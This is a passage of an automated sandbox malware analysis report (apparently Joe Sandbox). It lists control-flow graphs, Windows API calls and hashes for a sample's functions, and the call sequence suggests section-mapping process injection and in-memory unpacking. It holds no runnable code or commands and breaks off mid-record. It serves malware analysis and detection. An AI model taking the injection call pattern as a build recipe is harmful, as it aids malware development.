                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 323 4015d9-401602 318->323 324 4018dd 318->324 319->316 322 4018ec-40193b call 4011cd 319->322 323->324 331 401608-40161f NtDuplicateObject 323->331 324->322 331->324 333 401625-401649 NtCreateSection 331->333 335 4016a5-4016cb NtCreateSection 333->335 336 40164b-40166c NtMapViewOfSection 333->336 335->324 340 4016d1-4016d5 335->340 336->335 339 40166e-40168a NtMapViewOfSection 336->339 339->335 342 40168c-4016a2 339->342 340->324 343 4016db-4016fc NtMapViewOfSection 340->343 342->335 343->324 345 401702-40171e NtMapViewOfSection 343->345 345->324 348 401724 345->348 348->324 349 401724 call 401729 348->349 349->324
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 350 401729 351 40172b 350->351 352 40172f-40174d 350->352 351->352 353 40172d 351->353 364 401764 352->364 365 401755-401778 352->365 353->352 355 4016be-4016cb NtCreateSection 353->355 357 4016d1-4016d5 355->357 358 4018dd-40193b call 4011cd 355->358 357->358 362 4016db-4016fc NtMapViewOfSection 357->362 362->358 366 401702-40171e NtMapViewOfSection 362->366 364->365 375 40177b-4017b8 365->375 366->358 368 401724 366->368 368->358 372 401724 call 401729 368->372 372->358 392 4017ba-4017e3 375->392 397 4017e5-4017eb 392->397 398 4017ed 392->398 399 4017f3-4017f9 397->399 398->399 400 401809-40180d 399->400 401 4017fb-401807 399->401 400->399 402 40180f-401814 400->402 401->400 403 401816 call 40181b 402->403 404 40187c-40188b 402->404 406 40188e-401891 404->406 407 401893-40189d 406->407 408 4018bb-4018d4 406->408 409 4018a0-4018a9 407->409 408->358 410 4018b7 409->410 411 4018ab-4018b5 409->411 410->409 412 4018b9 410->412 411->410 412->406
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 33071139-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 4c003c-4c0047 1 4c004c-4c0263 call 4c0a3f call 4c0e0f call 4c0d90 VirtualAlloc 0->1 2 4c0049 0->2 17 4c028b-4c0292 1->17 18 4c0265-4c0289 call 4c0a69 1->18 2->1 19 4c02a1-4c02b0 17->19 22 4c02ce-4c03c2 VirtualProtect call 4c0cce call 4c0ce7 18->22 19->22 23 4c02b2-4c02cc 19->23 29 4c03d1-4c03e0 22->29 23->19 30 4c0439-4c04b8 VirtualFree 29->30 31 4c03e2-4c0437 call 4c0ce7 29->31 32 4c04be-4c04cd 30->32 33 4c05f4-4c05fe 30->33 31->29 35 4c04d3-4c04dd 32->35 36 4c077f-4c0789 33->36 37 4c0604-4c060d 33->37 35->33 39 4c04e3-4c0505 35->39 40 4c078b-4c07a3 36->40 41 4c07a6-4c07b0 36->41 37->36 42 4c0613-4c0637 37->42 51 4c0517-4c0520 39->51 52 4c0507-4c0515 39->52 40->41 44 4c086e-4c08be LoadLibraryA 41->44 45 4c07b6-4c07cb 41->45 46 4c063e-4c0648 42->46 50 4c08c7-4c08f9 44->50 48 4c07d2-4c07d5 45->48 46->36 49 4c064e-4c065a 46->49 53 4c0824-4c0833 48->53 54 4c07d7-4c07e0 48->54 49->36 55 4c0660-4c066a 49->55 56 4c08fb-4c0901 50->56 57 4c0902-4c091d 50->57 58 4c0526-4c0547 51->58 52->58 62 4c0839-4c083c 53->62 59 4c07e4-4c0822 54->59 60 4c07e2 54->60 61 4c067a-4c0689 55->61 56->57 63 4c054d-4c0550 58->63 59->48 60->53 64 4c068f-4c06b2 61->64 65 4c0750-4c077a 61->65 62->44 66 4c083e-4c0847 62->66 68 4c0556-4c056b 63->68 69 4c05e0-4c05ef 63->69 70 4c06ef-4c06fc 64->70 71 4c06b4-4c06ed 64->71 65->46 72 4c0849 66->72 73 4c084b-4c086c 66->73 74 4c056d 68->74 75 4c056f-4c057a 68->75 69->35 76 4c06fe-4c0748 70->76 77 4c074b 70->77 71->70 72->44 73->62 74->69 80 4c057c-4c0599 75->80 81 4c059b-4c05bb 75->81 76->77 77->61 84 4c05bd-4c05db 80->84 81->84 84->63
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004C024D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4c0000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7172b0b9a9028b5bc288cbda9fb143cf9a5cc347473573ab14e018b37c9fdbfb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88527B78A01229DFDBA4CF58C984BA9BBB1BF09304F1480DAE50DA7351DB34AE85DF15
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005EF118 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 413 5ef118-5ef131 414 5ef133-5ef135 413->414 415 5ef13c-5ef148 CreateToolhelp32Snapshot 414->415 416 5ef137 414->416 417 5ef14a-5ef150 415->417 418 5ef158-5ef165 Module32First 415->418 416->415 417->418 425 5ef152-5ef156 417->425 419 5ef16e-5ef176 418->419 420 5ef167-5ef168 call 5eedd7 418->420 423 5ef16d 420->423 423->419 425->414 425->418
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005EF140
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005EF160
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005E8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5e8000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b51d0d94c68f448d2ed4fde180785e21b5e9567c86424d9fbc7cf34ad79b2fe2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0C231600358ABD7283ABAE88DA6E7AE8BF49724F100278E682910C0CB70E8058760
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 426 4c0e0f-4c0e24 SetErrorMode * 2 427 4c0e2b-4c0e2c 426->427 428 4c0e26 426->428 428->427
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,004C0223,?,?), ref: 004C0E19
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,004C0223,?,?), ref: 004C0E1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4c0000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 37266e850fa7461fd680b01f9627d0ca78227899bd460c9d1794fc9cdfc8cad4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D01235145128B7D7403A94DC09BDE7B1CDF05B62F008411FB0DD9180C774994046E9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 429 40193e-401947 430 40195e 429->430 431 40194f-40195a 429->431 430->431 432 401961-4019ae call 4011cd Sleep call 401452 430->432 431->432 443 4019b0-4019b8 call 401553 432->443 444 4019bd-401a03 call 4011cd 432->444 443->444
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 458 40194a-4019ae call 4011cd Sleep call 401452 471 4019b0-4019b8 call 401553 458->471 472 4019bd-401a03 call 4011cd 458->472 471->472
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 486 40195c-4019ae call 4011cd Sleep call 401452 498 4019b0-4019b8 call 401553 486->498 499 4019bd-401a03 call 4011cd 486->499 498->499
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 513 401973-4019ae call 4011cd Sleep call 401452 524 4019b0-4019b8 call 401553 513->524 525 4019bd-401a03 call 4011cd 513->525 524->525
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 539 401964-4019ae call 4011cd Sleep call 401452 549 4019b0-4019b8 call 401553 539->549 550 4019bd-401a03 call 4011cd 539->550 549->550
                                                                                                                                                                                                                                                                                                                                                                  APIs
